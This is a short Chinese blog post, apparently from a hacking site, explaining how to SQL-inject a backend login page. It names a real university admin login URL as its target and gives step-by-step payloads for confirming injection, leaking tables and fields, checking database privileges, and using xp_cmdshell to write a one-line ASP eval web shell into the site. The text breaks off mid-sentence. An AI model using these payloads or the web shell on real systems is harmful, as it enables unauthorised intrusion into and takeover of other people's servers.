我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 网络攻防几种后台登陆注入方式
几种后台登陆注入方式
7211
1推荐
0评论

以下是小菜新得 各位看管莫笑 老牛 飘过------

废话不多说 开始

第一种注入 后台dbo 权限拿websehll
目标网站:http://bhst.edu.cn/manage/login.aspx




判断有无注入 输入” a’” 返回错误页面—
爆字表和字段 a’ having 1=1 --


a' and user>0--判断权限



看到dbo 权限我们 也部往下爆了 直接插马 格式如下--
a';exec master..xp_cmdshell 'Echo ^<%eval request("lb")%^> >网站的绝对路径
根据我们